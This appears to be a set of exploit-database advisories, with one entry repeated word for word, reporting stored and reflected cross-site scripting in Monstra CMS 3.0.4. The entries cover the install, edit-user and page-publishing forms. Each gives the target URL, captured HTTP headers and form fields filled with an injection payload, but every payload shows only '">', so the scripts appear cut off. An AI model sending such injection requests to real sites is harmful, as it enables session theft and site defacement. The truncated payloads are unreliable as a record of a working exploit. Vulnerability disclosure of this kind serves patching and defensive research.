# Exploit Title: [ Stored XSS at Monstra CMS 3.0.4 Install Page ]
# Date: [20.05.2018]
# Exploit Author: [Ismail Tasdelen]
# Vendor Homepage: [http://monstra.org/]
# Software Link: [ Monstra CMS ]
# Version: Monstra CMS 3.0.4
# Tested on: Windows 10 / Debian - XAMMP Web Server
# PoC : https://www.youtube.com/watch?v=AQweKapFzjI
# Stored XSS Payload : ">
# General :
Request URL: http://localhost/monstra-3.0.4/install.php?action=install
Request Method: POST
Status Code: 302 Found
Remote Address: [::1]:80
Referrer Policy: no-referrer-when-downgrade
# Response Headers :
Cache-Control: no-store, no-cache, must-revalidate
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Date: Mon, 21 May 2018 11:42:57 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Keep-Alive: timeout=5, max=100
location: index.php?install=done
Pragma: no-cache
Server: Apache/2.4.28 (Win32) OpenSSL/1.0.2l PHP/7.1.10
Transfer-Encoding: chunked
X-Powered-By: PHP/7.1.10
# Request Headers :
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cache-Control: max-age=0
Connection: keep-alive
Content-Length: 397
Content-Type: application/x-www-form-urlencoded
Cookie: _ga=GA1.1.462912790.1526777418; PHPSESSID=cf7161adcgd90rk4nsu2tne28v
Host: localhost
Origin: http://localhost
Referer: http://localhost/monstra-3.0.4/install.php?action=install
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Mobile Safari/537.36
# Query String Parametres :
action: install
# Form Data :
php:
simplexml:
mod_rewrite:
install:
sitemap:
htaccess:
public:
storage:
backups:
tmp:
sitename: ">
siteurl: ">
login: ">
password: 123456
timezone: Kwajalein
email: test@ismailtasdelen.me
install_submit: Install
-----------------------------
# Exploit Title: [ Reflected XSS at Monstra CMS 3.0.4 Edit User Page ]
# Date: [20.05.2018]
# Exploit Author: [Ismail Tasdelen]
# Vendor Homepage: [http://monstra.org/]
# Software Link: [ Monstra CMS ]
# Version: Monstra CMS 3.0.4
# Tested on: Windows 10 / Debian - XAMMP Web Server
# PoC : https://www.youtube.com/watch?v=_79BdaaPAuc
# Reflected XSS Payload : ">
# General :
Request URL: http://localhost/monstra-3.0.4/users/1/edit
Request Method: POST
Status Code: 302 302 Found
Remote Address: [::1]:80
Referrer Policy: no-referrer-when-downgrade
# Response Headers :
Cache-Control: no-store, no-cache, must-revalidate
Connection: Keep-Alive
Content-Length: 3028
Content-Type: text/html; charset=UTF-8
Date: Mon, 21 May 2018 11:59:34 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Keep-Alive: timeout=5, max=99
Location: http://localhost/monstra-3.0.4/users/1
Pragma: no-cache
Server: Apache/2.4.28 (Win32) OpenSSL/1.0.2l PHP/7.1.10
X-Powered-By: PHP/7.1.10
# Request Headers :
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cache-Control: max-age=0
Connection: keep-alive
Content-Length: 668
Content-Type: application/x-www-form-urlencoded
Cookie: _ga=GA1.1.462912790.1526777418; PHPSESSID=cf7161adcgd90rk4nsu2tne28v; _gid=GA1.1.1813213397.1526902993
Host: localhost
Origin: http://localhost
Referer: http://localhost/monstra-3.0.4/users/1/edit
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Mobile Safari/537.36
# Form Data :
csrf: 0542822c00801b440a8b47e941509f6aeec6e0be
user_id: 1
login: ">
firstname: ">
lastname: ">
email: ">
twitter: ">
skype: ">
about_me: ">
new_password: ">
edit_profile: Save
-----------------------------
# Exploit Title: [ Reflected XSS at Monstra CMS 3.0.4 Edit User Page ]
# Date: [20.05.2018]
# Exploit Author: [Ismail Tasdelen]
# Vendor Homepage: [http://monstra.org/]
# Software Link: [ Monstra CMS ]
# Version: Monstra CMS 3.0.4
# Tested on: Windows 10 / Debian - XAMMP Web Server
# PoC : https://www.youtube.com/watch?v=_79BdaaPAuc
# Reflected XSS Payload : ">
# General :
Request URL: http://localhost/monstra-3.0.4/users/1/edit
Request Method: POST
Status Code: 302 302 Found
Remote Address: [::1]:80
Referrer Policy: no-referrer-when-downgrade
# Response Headers :
Cache-Control: no-store, no-cache, must-revalidate
Connection: Keep-Alive
Content-Length: 3028
Content-Type: text/html; charset=UTF-8
Date: Mon, 21 May 2018 11:59:34 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Keep-Alive: timeout=5, max=99
Location: http://localhost/monstra-3.0.4/users/1
Pragma: no-cache
Server: Apache/2.4.28 (Win32) OpenSSL/1.0.2l PHP/7.1.10
X-Powered-By: PHP/7.1.10
# Request Headers :
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cache-Control: max-age=0
Connection: keep-alive
Content-Length: 668
Content-Type: application/x-www-form-urlencoded
Cookie: _ga=GA1.1.462912790.1526777418; PHPSESSID=cf7161adcgd90rk4nsu2tne28v; _gid=GA1.1.1813213397.1526902993
Host: localhost
Origin: http://localhost
Referer: http://localhost/monstra-3.0.4/users/1/edit
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Mobile Safari/537.36
# Form Data :
csrf: 0542822c00801b440a8b47e941509f6aeec6e0be
user_id: 1
login: ">
firstname: ">
lastname: ">
email: ">
twitter: ">
skype: ">
about_me: ">
new_password: ">
edit_profile: Save
-----------------------------
# Exploit Title: [ Stored XSS at Monstra CMS 3.0.4 Page Publishing Page ]
# Date: [20.05.2018]
# Exploit Author: [Ismail Tasdelen]
# Vendor Homepage: [http://monstra.org/]
# Software Link: [ Monstra CMS ]
# Version: Monstra CMS 3.0.4
# Tested on: Windows 10 / Debian - XAMMP Web Server
# PoC : https://www.youtube.com/watch?v=j62EBTErvuU
# Stored XSS Payload : ">
# General :
Request URL: http://localhost/monstra-3.0.4/admin/index.php?id=pages&action=add_page
Request Method: POST
Status Code: 302 302 Found
Remote Address: [::1]:80
Referrer Policy: no-referrer-when-downgrade
# Response Headers :
Cache-Control: no-store, no-cache, must-revalidate
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Date: Mon, 21 May 2018 12:11:49 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Keep-Alive: timeout=5, max=100
Location: index.php?id=pages
Pragma: no-cache
Server: Apache/2.4.28 (Win32) OpenSSL/1.0.2l PHP/7.1.10
Transfer-Encoding: chunked
X-Powered-By: PHP/7.1.10
# Request Headers :
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cache-Control: max-age=0
Connection: keep-alive
Content-Length: 518
Content-Type: application/x-www-form-urlencoded
Cookie: _ga=GA1.1.462912790.1526777418; PHPSESSID=cf7161adcgd90rk4nsu2tne28v; _gid=GA1.1.1813213397.1526902993
Host: localhost
Origin: http://localhost
Referer: http://localhost/monstra-3.0.4/admin/index.php?id=pages&action=add_page
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Mobile Safari/537.36
# Query String Parametres :
id: pages
action: add_page
# Form Data :
csrf: 0542822c00801b440a8b47e941509f6aeec6e0be
page_title: ">
page_name: ">
page_meta_title:
page_keywords:
page_description:
pages: 0
templates: index
status: published
access: public
editor: ">
page_tags: ">
add_page_and_exit: Save and Exit
page_date: 2018-05-22 00:11:1
# You want to follow my activity ?
https://www.linkedin.com/in/ismailtasdelen
https://github.com/ismailtasdelen
https://twitter.com/ismailtsdln